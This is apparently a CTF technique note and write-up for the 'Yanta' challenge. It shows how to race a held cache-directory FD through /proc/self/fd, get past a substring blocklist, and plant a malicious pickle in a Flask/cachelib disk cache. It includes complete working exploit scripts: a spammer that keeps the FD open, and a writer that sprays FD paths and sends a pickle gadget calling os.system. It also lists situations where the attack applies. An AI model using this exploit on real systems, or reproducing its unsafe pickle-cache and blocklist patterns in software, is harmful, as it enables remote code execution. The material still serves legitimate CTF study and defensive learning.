Note
Race a still-open cache-directory FD through /proc/self/fd to plant a malicious pickle, then force code execution on the next cache read.
FileSystemCache Race + Pickle via /proc/self/fd
FileSystemCache (Flask-Caching → cachelib) stores cache entries on disk as
struct.pack("I", expiry) followed by a pickle dump, under a filename that is just
md5(key_prefix + key). If you can write one arbitrary file into the cache directory, the next cache
read does pickle.load() on your bytes → RCE.
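The entry layout described above can be sketched as a benign round trip. The helper names `build_entry` and `read_entry` are hypothetical, and the expiry check (0 meaning "never expires", a past timestamp meaning "miss") is an assumption about how a cachelib-style reader behaves, not a copy of its code.

```python
import io
import pickle
import struct
import time


def build_entry(value, ttl=600):
    """Serialize a value as described in the note: expiry header, then pickle."""
    expiry = int(time.time()) + ttl
    return struct.pack("I", expiry) + pickle.dumps(value)


def read_entry(blob):
    """Mimic a cache read: check the expiry, then unpickle the remainder."""
    stream = io.BytesIO(blob)
    (expiry,) = struct.unpack("I", stream.read(4))
    if expiry != 0 and expiry < time.time():
        return None  # assumed behavior: an expired entry is treated as a miss
    return pickle.load(stream)  # the dangerous step when the bytes are untrusted


blob = build_entry({"html": "<p>hello</p>"})
print(len(blob[:4]), read_entry(blob))
```

Anything that controls the bytes after the first four controls what `pickle.load()` reconstructs, which is why a single file write is enough.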
The interesting part is how you write into a directory protected by a string blocklist. When the app
opens the cache directory as a file descriptor first and resolves the target filename relative to that
FD later (os.open(..., dir_fd=dirfd)), that open FD is a reusable capability. While it is open you
can reach it from another concurrent request as /proc/self/fd/<n>/<filename> — which contains neither
.. nor the literal string cache, so naive path filters never see it.
Why It Works
- The cachelib serializer is pickle by default, so a crafted cache file is arbitrary code execution on load — not just data corruption.
- This is not plain path traversal. The primitive is "open the directory now, resolve the filename
later against that FD". /proc/self/fd/<n> is a live symlink to the already-opened directory, so the string you submit never has to mention the real path.
- A concurrent worker model + a slow/large write keeps that directory FD open long enough to race a second request against it.
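The capability behavior can be checked locally with a minimal sketch, assuming a Linux host with procfs mounted. The function name `write_through_dir_fd` is hypothetical; it writes into a directory using only a `/proc/self/fd/<n>/` path, so the directory's real path never appears in the string that is opened.

```python
import os
import tempfile


def write_through_dir_fd(directory, filename, data):
    """Write data into directory using only a /proc/self/fd/<n>/ path.

    Returns the alias path that was opened, or None where /proc/self/fd
    is unavailable (non-Linux systems).
    """
    if not os.path.isdir("/proc/self/fd"):
        return None
    dirfd = os.open(directory, os.O_RDONLY | os.O_DIRECTORY)
    try:
        # The kernel follows the fd link to the open directory, then
        # looks up filename inside it.
        alias = f"/proc/self/fd/{dirfd}/{filename}"
        with open(alias, "wb") as f:
            f.write(data)
        return alias
    finally:
        os.close(dirfd)


with tempfile.TemporaryDirectory() as tmp:
    alias = write_through_dir_fd(tmp, "planted.bin", b"hello")
    if alias is not None:
        with open(os.path.join(tmp, "planted.bin"), "rb") as f:
            print(alias, "->", f.read())
```

In the real attack the directory FD belongs to another thread of the same process, which is why the open window and the FD number both have to be guessed.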
Vulnerable Pattern
A custom render-cache that opens the cache dir, renders, then writes the file via dir_fd. From the
Yanta challenge (rendercache.py):
def render_and_cache(self, name, body):
    fc = self._cache.cache
    fname = os.path.basename(fc._get_filename(self._key(name)))  # md5("note:"+name)
    dirfd = os.open(fc._path, os.O_RDONLY | os.O_DIRECTORY)      # FD -> /data/cache (held open)
    out = render_text(body.decode("utf-8"))
    fd = os.open(fname, os.O_WRONLY | os.O_CREAT | os.O_TRUNC, 0o644, dir_fd=dirfd)
    with os.fdopen(fd, "wb") as f:
        f.write(struct.pack("I", int(time.time()) + self.ttl))   # 4-byte expiry header
        fc.serializer.dump(out, f)                               # pickle dump
    os.close(dirfd)
    return out
The note routes let you POST raw bytes to an arbitrary name, guarded only by a substring blocklist
(storage.py / views.py):
BLOCKED = ("..", "cache")

def check_title(title):
    low = title.lower()
    for tok in BLOCKED:
        if tok in low:
            abort(403, f"title rejected: {tok!r} is not allowed")

# POST /note?name=<title> -> save_note writes request body verbatim to NOTES_DIR/<title>
def save_note(title, body):
    path = _note_path(title)  # os.path.join("/data/notes", title)
    parent = os.path.dirname(path)
    if parent:
        os.makedirs(parent, exist_ok=True)
    with open(path, "wb") as f:
        f.write(body)
os.path.join("/data/notes", "/proc/self/fd/12/<md5>") returns the absolute second argument, so the
write lands in /proc/self/fd/12/<md5> → i.e. /data/cache/<md5>. /data is writable (777) and the
string dodges the blocklist.
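The two properties the bypass relies on can be shown without touching the filesystem. This is a sketch: `passes_blocklist` and `resolve` are hypothetical stand-ins for `check_title` and `_note_path`, and `posixpath` is used so the join behaves the same on any host.

```python
import posixpath

BLOCKED = ("..", "cache")
NOTES_DIR = "/data/notes"


def passes_blocklist(title):
    """Return True when no blocked substring appears in the title."""
    low = title.lower()
    return not any(tok in low for tok in BLOCKED)


def resolve(title):
    # posixpath.join discards earlier components when a later one is absolute
    return posixpath.join(NOTES_DIR, title)


for title in ("welcome.txt", "../cache/abc", "/proc/self/fd/12/abc"):
    print(f"{title!r}: allowed={passes_blocklist(title)} -> {resolve(title)}")
```

Only the third title both passes the filter and escapes `NOTES_DIR`, since the filter inspects the string while the kernel resolves the link.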
The concurrency comes from the gunicorn launch (Dockerfile):
gunicorn -w 1 --threads 8 --timeout 60 -b 0.0.0.0:8000 wsgi:app
One process (so /proc/self/fd is shared) but 8 threads → requests run concurrently → you can hit the
open directory FD from another thread.
Cache filename derivation
key_prefix = "note:"
# filename = md5(key_prefix + name)
>>> import hashlib; hashlib.md5(b"note:welcome.txt").hexdigest()
'6400cc4589432cfd24676ffc62c5e3c1' # matches /data/cache/6400cc45...
So the cache file for a note you'll later read as name=cnf409 is md5("note:cnf409").
Exploit Flow
- Derive the target cache filename: md5("note:" + READ_NAME).
- Build the malicious file = struct.pack("I", now+ttl) + pickle.dumps(gadget), matching the exact on-disk format cachelib expects.
- Spammer: continuously POST large notes and GET them to force render_and_cache, keeping a directory FD to /data/cache open as often as possible (the big serialize/write widens the window).
- Writer: spray POSTs to name=/proc/self/fd/<n>/<md5> across plausible FD numbers (the dir FD was observed around fd 11–13; spray ~7–16). One of them resolves into /data/cache and writes your file.
- Force a cache read of READ_NAME so the app pickle.load()s your file → code runs.
Worked Exploit
Spammer — holds the cache-dir FD open by writing/reading 1 MB notes in a loop:
import requests, time

URL = "http://localhost:8000/"
i = 0
while True:
    name = f"spam_{i}.txt"
    i += 1
    requests.post(URL + f"note?name={name}", data="r" * 1_000_000)  # large body = slow write
    requests.get(URL + f"note?name={name}")                         # GET triggers render_and_cache
    time.sleep(0.01)
Writer — plant the pickle through the open FD, then trigger the load:
import requests, hashlib, pickle, struct, time

URL = "http://localhost:8000/"
READ = "cnf409"
MD5 = hashlib.md5(f"note:{READ}".encode()).hexdigest()

class RCE:
    def __reduce__(self):
        import os
        return (os.system, ("/getflag > /tmp/out; chmod 666 /tmp/out",))

# rebuild the exact cache-entry format: 4-byte expiry header + pickle payload
payload = struct.pack("I", int(time.time()) + 600) + pickle.dumps(RCE())

while True:
    for fd in range(7, 17):  # dir FD is usually ~11-13, spray a range
        r = requests.post(URL + f"note?name=/proc/self/fd/{fd}/{MD5}", data=payload)
        if r.status_code == 200:
            # A 200 means the write went through the open directory FD. The entry
            # now exists on disk, so the next read is a cache hit: get() unpickles
            # our bytes instead of calling render_and_cache.
            requests.get(URL + f"note?name={READ}")  # forces cache.get() -> pickle.load() -> RCE
            requests.get(URL + f"note?name={READ}")
            raise SystemExit(f"fired via fd {fd}")
Run the spammer in the background, then the writer. On success the gadget executes; here it runs the
suid /getflag helper and stashes the flag in /tmp/out.
Variations
- If the read key is not directly controllable, poison a predictable entry instead (cached homepage /
dashboard view, e.g. cachelib keys like view//<path>).
- If the serializer is no longer pickle, the file write is still useful: stale-content poisoning, HTML injection into a cached page, or feeding a second-stage parser.
- The dir_fd capability trick generalizes to any "open dir/file now, resolve a user string against it later" pattern, not just caches.
Common Blockers
- The on-disk format must be exact: cachelib prepends a 4-byte expiry, packed with struct.pack("I", ...) in native byte order (little-endian on x86-64), before the pickle. Get the header wrong (malformed, or an expiry already in the past) and the load fails before reaching your gadget.
- Worker/thread model matters: the second request must share the /proc/self/fd namespace of the process holding the directory FD (single multi-threaded process is ideal; multiple processes need the FD held in the same worker you hit).
- The FD number drifts: spray a small range and/or re-derive it from /proc/<pid>/fd if you have any read primitive.
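For the FD-drift blocker, the sketch below shows what re-deriving the number looks like when you can run code inside a local copy of the target (for example a rebuilt challenge container). The function name `directory_fds` is hypothetical and a Linux procfs is assumed. With only a remote read primitive you would apply the same idea to whatever listing of `/proc/<pid>/fd` you can obtain.

```python
import os
import tempfile


def directory_fds(proc_fd_dir="/proc/self/fd"):
    """Map open FD numbers to their targets, keeping only directories."""
    found = {}
    if not os.path.isdir(proc_fd_dir):
        return found  # no procfs on this host
    for entry in os.listdir(proc_fd_dir):
        link = os.path.join(proc_fd_dir, entry)
        try:
            target = os.readlink(link)
        except OSError:
            continue  # FD was closed between listdir and readlink
        if os.path.isdir(target):
            found[int(entry)] = target
    return found


if os.path.isdir("/proc/self/fd"):
    with tempfile.TemporaryDirectory() as tmp:
        held = os.open(tmp, os.O_RDONLY)  # stand-in for the held cache-dir FD
        try:
            print(held, directory_fds().get(held))
        finally:
            os.close(held)
```

Running this a few times under realistic load gives a better spray range than guessing.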
Good Situations To Use It
- A Flask/cachelib app caching rendered pages to disk with user-influenced keys and a default (pickle) serializer.
- Deterministic cache filenames (md5(prefix+key)) you can compute offline.
- A slow/large endpoint and concurrency to keep the cache-directory FD open during the race.
Sources
- midnight_flag_finals_2026/web/yanta
- cachelib FileSystemCache format: https://github.com/pallets-eco/cachelib/blob/main/src/cachelib/file.py